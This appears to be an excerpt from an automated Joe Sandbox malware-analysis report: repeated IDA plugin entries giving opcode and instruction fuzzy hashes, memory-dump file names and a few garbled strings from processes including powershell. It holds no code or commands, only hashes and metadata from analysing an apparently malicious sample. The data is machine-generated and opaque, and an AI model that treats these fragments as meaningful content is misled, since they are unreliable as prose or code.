                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fe4b29e7d3128d789347cb40ef52d241e140f13b0d81b78c1de3353a865f87bb
                                                                                                                                                                                                                                • Instruction ID: 525cd106ce7c70a02b35033812ce099ad1e3018b460f9d246b2cfb0d4a72c9a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe4b29e7d3128d789347cb40ef52d241e140f13b0d81b78c1de3353a865f87bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF01534A00205CFEB18CF56C888B99FBF1BF49314F158694D005AB2A0C7748945CF50
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d6c32370ccaf67a2f9a163f06f5f33bc7d26f3368d18bbf0bfa07c4ed3057ba9
                                                                                                                                                                                                                                • Instruction ID: ea458c42193b9a68cfadaf2f754f4c7b61293a1e3bb48c094c613d2fc1b704b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6c32370ccaf67a2f9a163f06f5f33bc7d26f3368d18bbf0bfa07c4ed3057ba9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D02E7A7043112BE228250CBC90F2BB2E9EFC8A60F12843EF605EB3C5CA618C1047A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9ea7fbcbf52d1213b7b83b3bd66d62bfd35d2c656ce030951bc5b1fcf7829ea3
                                                                                                                                                                                                                                • Instruction ID: 37f69c208738784ef8d08610d69c5552ebd4e6bbc0d301f958ac5258e6fd15e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea7fbcbf52d1213b7b83b3bd66d62bfd35d2c656ce030951bc5b1fcf7829ea3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E0E53890424ACFEB16CB54C88CB69BBF0BB06364F1487D5D442AB1E1C3744945CB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a8ce7dcb33e3aa5c4ced7e4af5064a871edd6a37f5880be4a8acbf84997de834
                                                                                                                                                                                                                                • Instruction ID: 52b1a927d92668b04ceb971a295ac26a887ac776168c2c80688b6e183dfb1a41
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8ce7dcb33e3aa5c4ced7e4af5064a871edd6a37f5880be4a8acbf84997de834
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1D01274E04114CFC714CF89E9444ECBBB8BFC9225F0162A5D01AA72A2D33098128B54
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1c4459b711ec20ccc4f7d0040462cef1ca173e4f2485eea649bd3ff03bc3081f
                                                                                                                                                                                                                                • Instruction ID: a7a693bb022bc449124c21207947536e66c383d1c7e14b0e97205abc64c2acb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4459b711ec20ccc4f7d0040462cef1ca173e4f2485eea649bd3ff03bc3081f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE04F78941109DFC710EBACE944A9D77B5EB44314F1049A8D409D3750EB705E549B51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 41c2c174105cbe1fb5ed9de55f3035a53b68dcbfd07d44dc36aca9bb1816de68
                                                                                                                                                                                                                                • Instruction ID: 2ad8a01337d82908f8929f80a122e6a6adb741c10784c6c26fdcec7e58ce10bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41c2c174105cbe1fb5ed9de55f3035a53b68dcbfd07d44dc36aca9bb1816de68
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D0C938954145CFCB56DB64D89CBA8FBE2BB0A321F1886C4E85A9B2E1C7349C41CF20
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: kU0o^${U0o^$[0o^
                                                                                                                                                                                                                                • API String ID: 0-1618954945
                                                                                                                                                                                                                                • Opcode ID: 67fe769c87037e1def5486fae03de9e470342de048e4f11124da58a7ac6136f8
                                                                                                                                                                                                                                • Instruction ID: e2b6bf1e8592c9c422a6e1ee5206148661f3f1ff71ee69be49dfa6a2b2377258
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67fe769c87037e1def5486fae03de9e470342de048e4f11124da58a7ac6136f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79919375B007199BDB29EFB4C4146AEB7F2EF84604B00892CD15AAF350DF745E0A8BC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: kU0o^${U0o^$[0o^
                                                                                                                                                                                                                                • API String ID: 0-1618954945
                                                                                                                                                                                                                                • Opcode ID: 2db0a7e8c70ef598a4cb56d0adbe6bae25059daf2dfeb44fc26f7500d57f0ef8
                                                                                                                                                                                                                                • Instruction ID: 89f4bea6f4b46a65deba60e8fb88f7465bb5e508bd51ea0d273031fdb7e3c70e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2db0a7e8c70ef598a4cb56d0adbe6bae25059daf2dfeb44fc26f7500d57f0ef8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7918375B007199BDB29EFB4C4146AEB7F2EF84604B00892CD15AAF354DF745E0A8BC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-4154621813
                                                                                                                                                                                                                                • Opcode ID: d7e1b02ca1bd5327b0e70cef4ab58be45235bdeae8891e2f0647e670edf46a4a
                                                                                                                                                                                                                                • Instruction ID: 75f92e9949915c778fc36b87626de3f90f9125fbb4cd1ebba20067ecea699d9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e1b02ca1bd5327b0e70cef4ab58be45235bdeae8891e2f0647e670edf46a4a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451B3303841148FD728DB79E594AED7BF6AF8974031848E9D046CFBA5DE29DC428B52
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                • API String ID: 0-1420252700
                                                                                                                                                                                                                                • Opcode ID: 84ea015d8d16569522084fca808fb775564e2847b1cc4a859e51f39e88b9dc74
                                                                                                                                                                                                                                • Instruction ID: 64d56f85760114e31c6717cb1086c8dcae1e27d7ed0d02e0ab52a7c0dd21480b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84ea015d8d16569522084fca808fb775564e2847b1cc4a859e51f39e88b9dc74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 831258B1B002958FCB19CB68A85076A7FA6AFC1321F14C0AED545CF396DE35CE45C7A2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                                                                • Opcode ID: 81d2436985bc95f65c16d7019e5ab38481088e4cafc641e7b55ffed1258a4891
                                                                                                                                                                                                                                • Instruction ID: 440de485eb5f781190c3ef29cf408a07624c496d3a342321f73ef1dce3691d6b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d2436985bc95f65c16d7019e5ab38481088e4cafc641e7b55ffed1258a4891
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A2217B1B00206CFCB15DB69D4806AABBE6BF85321F1480BED515CF351EB35DA85CBA1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (bq
                                                                                                                                                                                                                                • API String ID: 0-149360118
                                                                                                                                                                                                                                • Opcode ID: 28fae0b41881c91cd438e05849dfa840e0dc42d721717c70dae53107c19b2330
                                                                                                                                                                                                                                • Instruction ID: 21f52dc3341e08af7022e90f958b0b676a870a3ed25c617bacfd358477df799d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28fae0b41881c91cd438e05849dfa840e0dc42d721717c70dae53107c19b2330
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6412C34B042498FDB18DB68C494AADBBF2EFCD315F19449AE442AB3A5CB35DD01CB61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (&^q
                                                                                                                                                                                                                                • API String ID: 0-2067289071
                                                                                                                                                                                                                                • Opcode ID: b22dbae19bbc8eaf2955e3f177ca18afdeb2377d47b9d1fe1cffb92efe293826
                                                                                                                                                                                                                                • Instruction ID: 71e79b033fc170957c34fcb9e12761c16e111143b47830a4259cfe16f4d8985d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b22dbae19bbc8eaf2955e3f177ca18afdeb2377d47b9d1fe1cffb92efe293826
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121B075A042588FCB14DFAED404BEEBFF5EB88320F14846AD418E7350CB749845CBA5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 819a02cc3deb02b46e6afa2c5e7add7a4595a646cf6ef0e3cb370c19ea4d671d
                                                                                                                                                                                                                                • Instruction ID: 0ac8aade9acd740b35a1126b25d3cf48d162687023343895017db3f4634b65af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 819a02cc3deb02b46e6afa2c5e7add7a4595a646cf6ef0e3cb370c19ea4d671d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BB11634E012089FCB15DFA9D584ADDFBF2AF88314F298159E818AB366C771ED45CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 21f474188c70efd2a102a4e7a4a79fbcbdf76d163a67e52a4ca70182d4b0f9bb
                                                                                                                                                                                                                                • Instruction ID: 22fa0a8fda5fb0b07d40d3d005e655da820977b5b0106b5ead002a53d56f04a0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21f474188c70efd2a102a4e7a4a79fbcbdf76d163a67e52a4ca70182d4b0f9bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33916C34B10215CFCB14DF79D5846AEBBFABF88710B188069E805EB364EA35DC42CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 805b531bbb3d4fc419b322ae7690dff294a27707a09c975c2bd15853babb94dd
                                                                                                                                                                                                                                • Instruction ID: 27553310e030343e5878c4063c119ae2dd373051ce509532107a17416fcf95e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 805b531bbb3d4fc419b322ae7690dff294a27707a09c975c2bd15853babb94dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B915AB0A016458FCB15CF59C494AAEFBB1FF48310B248999D815AB366D736FC51CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5ab0e9a2e2c0916e559ab1f4de3b954579ca0342b60eab3d1a3b3a5c5e235e83
                                                                                                                                                                                                                                • Instruction ID: 91f127a0214f1561b9462f0b895732d172b0c650288ebbb84fafc377bf85e7ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab0e9a2e2c0916e559ab1f4de3b954579ca0342b60eab3d1a3b3a5c5e235e83
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1151D1343042459FD718DB79E854B6AB7FAFFC8211B1945AAE509DB361EB31DC01CBA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2be2aad33ef27a640bdce23bf0c4590b001571dff4427e99be6fbb6b32fe27d2
                                                                                                                                                                                                                                • Instruction ID: 2e279c40ff16d15d39ea0c8832939382c372172c3616c0e7c1ae9f85f8ff4663
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2be2aad33ef27a640bdce23bf0c4590b001571dff4427e99be6fbb6b32fe27d2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7461F371E00248DFCB14DFA9D584BDDFBF2EF88314F19816AE819AB264EB349945CB50
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d8252013ab01223d6abc5c8c11f0e9cf61ad99b992288c309d2e43d319e99415
                                                                                                                                                                                                                                • Instruction ID: 2214bee98282cc6f86aae8b5a7f3ee7877fb7bcfbb7b30578683ce7614b5fe58
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8252013ab01223d6abc5c8c11f0e9cf61ad99b992288c309d2e43d319e99415
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1251F171E00248DFCB14DFA9D584BDDFBF6EF88314F19806AE819AB264EB349945CB50
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 496ee66b9a78df5e536dcabcb8e7c75053b04c535984cf13eb57f47f717609b1
                                                                                                                                                                                                                                • Instruction ID: ce03ff7a8c6f048fed83d12a6117ad3efc4fb841e109c3cfc2c201288b18785f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 496ee66b9a78df5e536dcabcb8e7c75053b04c535984cf13eb57f47f717609b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4414F747002058FDB14DB6CD594AAABBF6EF88304B1584A9F449CF765EB34DC01CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40204a9679bad9678b2fa3810432ffe4cc65f75680f1c26a08a8ce9ab536bebb
                                                                                                                                                                                                                                • Instruction ID: 063ba3069a553005bad6aef6c95d5f842f0bf7ea252001396e3bb87d7faa86ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40204a9679bad9678b2fa3810432ffe4cc65f75680f1c26a08a8ce9ab536bebb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF414D747002058FDB10DF6CD594AAABBFAEF88300B1584A9F449CB769EB34ED01CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 63de43e2ba944d8aaad9df98fda154636c0ab663cbb26d19107e7006cd5bc946
                                                                                                                                                                                                                                • Instruction ID: 74fc8444c6352afb3a7e5f30d0cf879ee57bc3d2021e06dd6284b4d964cb49ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63de43e2ba944d8aaad9df98fda154636c0ab663cbb26d19107e7006cd5bc946
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA413D346042498FCB09DF64C4A8AE9BBF1EF8E314F19509AE445EB3A6DB31DC01DB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d29d650205c4906e5ece2cb81afe1d4bd9cf712ded06b192c35c065aa66e3b2a
                                                                                                                                                                                                                                • Instruction ID: e12a1b364657da1eec9df1bb4b88ebd9f89169b96d8208abdea2949a5daccef0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29d650205c4906e5ece2cb81afe1d4bd9cf712ded06b192c35c065aa66e3b2a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 974136B0A015059FCB05CF48C598AEAFBB1FF48310B158599D815AB365C736FC51CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 37b82b29f917745cec35012c5c4e771a465eb1c6bc5ebadcdab9a5e65b3eab82
                                                                                                                                                                                                                                • Instruction ID: 92031a82e5d70fe05e90879952b8c72fd55a5588dbd297a9b470f69713cdf66e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37b82b29f917745cec35012c5c4e771a465eb1c6bc5ebadcdab9a5e65b3eab82
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0231D9F0A10242CBCB24CF24E58166AB7B7AF80759F14C09DD9059F39ADB35DE44CBA6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bef378a4149e715768d8a3340892d478f96d9ccc7b82aa513e501a9d2f9c326d
                                                                                                                                                                                                                                • Instruction ID: dac5f539be1a9ba19f2b0a9ffa785665f5e6b77c06c85693a874cc23adc0c89a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bef378a4149e715768d8a3340892d478f96d9ccc7b82aa513e501a9d2f9c326d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99318E353006029FD705DB78E894B9AB7A6EFC4214F048679D60ACB364DF71E949CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 57c02060d92e53fba29b6a5a3c0e5d48c2612f412be53a519f13633d678bf7d7
                                                                                                                                                                                                                                • Instruction ID: 5c55c2adb3958da0d383f1e616f0dfac0fa790c0851d1a9bea1eadcd2bba6eb4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57c02060d92e53fba29b6a5a3c0e5d48c2612f412be53a519f13633d678bf7d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C841D634E012099FDB05CBA9D584ADDFBF2AF88304F28C159E414AB366C771ED86CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7aefba4d03bd8a2c21e949a45c0c75aafebac055c646e7f440fa02051d776cec
                                                                                                                                                                                                                                • Instruction ID: 77682b12685437105fff35fe5b40f605976e947dad91ce85bf9eedf9e76a746a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aefba4d03bd8a2c21e949a45c0c75aafebac055c646e7f440fa02051d776cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F315C74E002099FDB44EFA9D495BEEBBF6EF89311F148069E405EB754EA348C41CB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
